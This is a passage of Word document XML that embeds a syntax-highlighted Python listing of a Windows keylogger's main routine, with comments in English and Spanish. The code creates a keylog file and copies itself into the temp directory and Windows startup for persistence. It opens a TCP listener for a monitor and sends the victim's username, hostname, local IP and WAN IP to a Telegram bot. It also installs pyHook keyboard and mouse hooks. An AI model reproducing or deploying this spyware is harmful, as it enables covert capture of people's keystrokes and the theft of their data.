          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1188" w:name="l841"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">841  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1188"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1189" w:name="l842"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">842  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1189"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Create new keylog file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1190" w:name="l843"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">843  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1190"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>create_keylog_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1191" w:name="l844"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">844  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1191"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1192" w:name="l845"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">845  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1192"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Replicate current executable file into temp directory and adds to Windows startup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1193" w:name="l846"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">846  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1193"/>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replicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1194" w:name="l847"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">847  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1194"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>add_keylogger_to_startup</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>self_replicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>filerealpath</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1195" w:name="l848"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">848  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1195"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1196" w:name="l849"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">849  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1196"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Create server that listens TCP petitions from Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1197" w:name="l850"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">850  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1197"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ServerListenerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_BUFFER_SIZE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1198" w:name="l851"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">851  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1198"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>server</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1199" w:name="l852"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">852  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1199"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1200" w:name="l853"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">853  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1200"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Telegram Bot start message notifying that the keylogger is up and running with user and host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1201" w:name="l854"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">854  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1201"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_message</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Iniciando {} v{} para el Usuario {} en el Equipo {} {}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1202" w:name="l855"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">855  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1202"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Su IP Local es {} y la IP Wan es {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1203" w:name="l856"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">856  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1203"/>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PPNAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>VERSION</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11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>localip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>externalip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1204" w:name="l857"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">857  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1204"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1205" w:name="l858"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">858  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1205"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Select Hook modules to operate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1206" w:name="l859"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">859  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1206"/>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207" w:name="l860"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">860  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="120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WinHook'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1208" w:name="l861"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">861  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1208"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Creates new hook manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1209" w:name="l862"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">862  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1209"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">hm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pyHook</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>HookManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1210" w:name="l863"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">863  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1210"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1211" w:name="l864"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">864  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1211"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Register event callbacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1212" w:name="l865"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">865  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1212"/>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MouseAllButtonsDown </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_mouse_event_pyWinHook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1213" w:name="l866"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">866  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1213"/>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KeyDown </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_keyboard_event_pyWinHook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1214" w:name="l867"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">867  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1214"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Sets hook for Mouse and Keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1215" w:name="l868"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">868  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1215"/>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Mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1216" w:name="l869"/>
